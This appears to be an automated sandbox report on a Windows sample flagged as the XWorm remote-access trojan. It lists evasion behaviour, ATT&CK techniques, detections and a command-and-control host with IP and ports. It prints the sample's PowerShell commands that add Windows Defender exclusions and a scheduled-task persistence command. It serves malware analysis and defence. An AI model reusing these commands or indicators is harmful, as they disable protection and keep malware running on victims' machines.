            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\boost Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\OpenWith.exe Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\aZDwfEKorn.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\aZDwfEKorn.exe Memory allocated: 1570000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\aZDwfEKorn.exe Memory allocated: 1AFD0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\boost Memory allocated: 1710000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\boost Memory allocated: 1B2A0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\boost Memory allocated: 16D0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\boost Memory allocated: 1B2B0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\aZDwfEKorn.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\boost Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\aZDwfEKorn.exe Window / User API: threadDelayed 892
            Source: C:\Users\user\Desktop\aZDwfEKorn.exe Window / User API: threadDelayed 8921
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5058
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4741
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7965
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1606
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8062
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1529
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7814
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1813
            Source: C:\Users\user\Desktop\aZDwfEKorn.exe TID: 8016 Thread sleep time: -15679732462653109s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3540 Thread sleep time: -3689348814741908s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7300 Thread sleep time: -2767011611056431s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7528 Thread sleep count: 8062 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7524 Thread sleep count: 1529 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7560 Thread sleep time: -3689348814741908s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7744 Thread sleep count: 7814 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7748 Thread sleep count: 1813 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7776 Thread sleep time: -3689348814741908s >= -30000s
            Source: C:\Users\user\AppData\Roaming\boost TID: 8108 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\svchost.exe TID: 7200 Thread sleep time: -30000s >= -30000s
            Source: C:\Users\user\AppData\Roaming\boost TID: 2176 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
            Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
            Source: C:\Users\user\Desktop\aZDwfEKorn.exe File Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\AppData\Roaming\boost File Volume queried: C:\ FullSizeInformation
            Source: svchost.exe, 00000018.00000002.2528219790.000002A272A58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.2525223571.000002A26D42B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
            Source: aZDwfEKorn.exe, 00000000.00000002.2535770100.000000001BE40000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\aZDwfEKorn.exe Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\aZDwfEKorn.exe Process token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
            Source: C:\Users\user\AppData\Roaming\boost Process token adjusted: Debug
            Source: C:\Users\user\Desktop\aZDwfEKorn.exe Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\aZDwfEKorn.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\aZDwfEKorn.exe'
            Source: C:\Users\user\Desktop\aZDwfEKorn.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\boost'
            Source: C:\Users\user\Desktop\aZDwfEKorn.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'aZDwfEKorn.exe'
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'boost'Jump to behavior
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "boost" /tr "C:\Users\user\AppData\Roaming\boost"Jump to behavior
Source: aZDwfEKorn.exe, 00000000.00000002.2528923566.0000000003046000.00000004.00000800.00020000.00000000.sdmp, aZDwfEKorn.exe, 00000000.00000002.2528923566.0000000003057000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
Source: aZDwfEKorn.exe, 00000000.00000002.2528923566.0000000003046000.00000004.00000800.00020000.00000000.sdmp, aZDwfEKorn.exe, 00000000.00000002.2528923566.0000000003057000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager
Source: aZDwfEKorn.exe, 00000000.00000002.2528923566.0000000003046000.00000004.00000800.00020000.00000000.sdmp, aZDwfEKorn.exe, 00000000.00000002.2528923566.0000000003057000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
Source: aZDwfEKorn.exe, 00000000.00000002.2528923566.0000000003046000.00000004.00000800.00020000.00000000.sdmp, aZDwfEKorn.exe, 00000000.00000002.2528923566.0000000003057000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@
Source: aZDwfEKorn.exe, 00000000.00000002.2528923566.0000000003046000.00000004.00000800.00020000.00000000.sdmp, aZDwfEKorn.exe, 00000000.00000002.2528923566.0000000003057000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager2
Source: C:\Users\user\Desktop\aZDwfEKorn.exe | Queries volume information: C:\Users\user\Desktop\aZDwfEKorn.exe VolumeInformation
Source: C:\Users\user\Desktop\aZDwfEKorn.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\boost | Queries volume information: C:\Users\user\AppData\Roaming\boost VolumeInformation
Source: C:\Windows\System32\OpenWith.exe | Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\System32\OpenWith.exe | Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
Source: C:\Windows\System32\OpenWith.exe | Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\aZDwfEKorn.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: aZDwfEKorn.exe, 00000000.00000002.2535770100.000000001BED8000.00000004.00000020.00020000.00000000.sdmp, aZDwfEKorn.exe, 00000000.00000002.2535770100.000000001BF06000.00000004.00000020.00020000.00000000.sdmp, aZDwfEKorn.exe, 00000000.00000002.2523345166.0000000001271000.00000004.00000020.00020000.00000000.sdmp, aZDwfEKorn.exe, 00000000.00000002.2535770100.000000001BEBF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\aZDwfEKorn.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Source: Yara match | File source: aZDwfEKorn.exe, type: SAMPLE
Source: Yara match | File source: 0.0.aZDwfEKorn.exe.d30000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.1255996540.0000000000D32000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: aZDwfEKorn.exe PID: 5900, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\boost, type: DROPPED

Remote Access Functionality

Source: Yara match | File source: aZDwfEKorn.exe, type: SAMPLE
Source: Yara match | File source: 0.0.aZDwfEKorn.exe.d30000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.1255996540.0000000000D32000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: aZDwfEKorn.exe PID: 5900, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\boost, type: DROPPED
MITRE ATT&CK Matrix (one line per tactic; the numbers preceding some techniques are reproduced as shown in the report)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 11 Windows Management Instrumentation; 1 Scheduled Task/Job; 1 PowerShell; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: 1 Scheduled Task/Job; 21 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: 12 Process Injection; 1 Scheduled Task/Job; 21 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: 21 Masquerading; 11 Disable or Modify Tools; 141 Virtualization/Sandbox Evasion; 12 Process Injection; 1 Deobfuscate/Decode Files or Information; 1 Obfuscated Files or Information; 2 Software Packing; 1 DLL Side-Loading
Credential Access: 1 Input Capture; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 231 Security Software Discovery; 2 Process Discovery; 141 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 File and Directory Discovery; 23 System Information Discovery; Remote System Discovery; System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: 1 Input Capture; 11 Archive Collected Data; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: 1 Encrypted Channel; 1 Non-Standard Port; 1 Non-Application Layer Protocol; 11 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Behavior Graph (ID: 1575207; Sample: aZDwfEKorn.exe; Startdate: 14/12/2024; Architecture: WINDOWS; Score: 100). Nodes recovered from the graph: aZDwfEKorn.exe drops C:\Users\user\AppData\Roaming\boost (PE32) and contacts audio-clouds.gl.at.ply.gg (147.185.221.24, ports 28408, 49826, 49887, SALSGIVERUS, United States); it starts three powershell.exe processes and 2 other processes, each powershell.exe with a conhost.exe child; boost and svchost.exe (127.0.0.1) also run. Signatures shown on the graph: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 12 other signatures; Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Protects its processes via BreakOnTermination flag; Bypasses PowerShell execution policy; Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Loading BitLocker PowerShell Module.

Source | Detection | Scanner | Label
aZDwfEKorn.exe | 82% | ReversingLabs | ByteCode-MSIL.Backdoor.XWormRAT
aZDwfEKorn.exe | 100% | Avira | TR/Spy.Gen
aZDwfEKorn.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\boost | 100% | Avira | TR/Spy.Gen
C:\Users\user\AppData\Roaming\boost | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\boost | 82% | ReversingLabs | ByteCode-MSIL.Backdoor.XWormRAT

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label
http://crl.m:t | 0% | Avira URL Cloud | safe
audio-clouds.gl.at.ply.gg | 100% | Avira URL Cloud | malware
Name | IP | Active | Malicious | Antivirus Detection | Reputation
audio-clouds.gl.at.ply.gg | 147.185.221.24 | true | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
audio-clouds.gl.at.ply.gg | true | Avira URL Cloud: malware | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000007.00000002.1360053265.000001A1240F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1442850240.000002979D871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1629972370.00000225E979E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1905721208.000002781F53D000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.m | powershell.exe, 00000007.00000002.1367393487.000001A12C853000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://g.live.com/odclientsettings/Prod1C: | edb.log.24.dr | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000010.00000002.1722435612.000002780F6F8000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000007.00000002.1342572886.000001A1142A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1393262886.000002978DA28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1502426529.00000225D995A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1722435612.000002780F6F8000.00000004.00000800.00020000.00000000.sdmp | false | | high
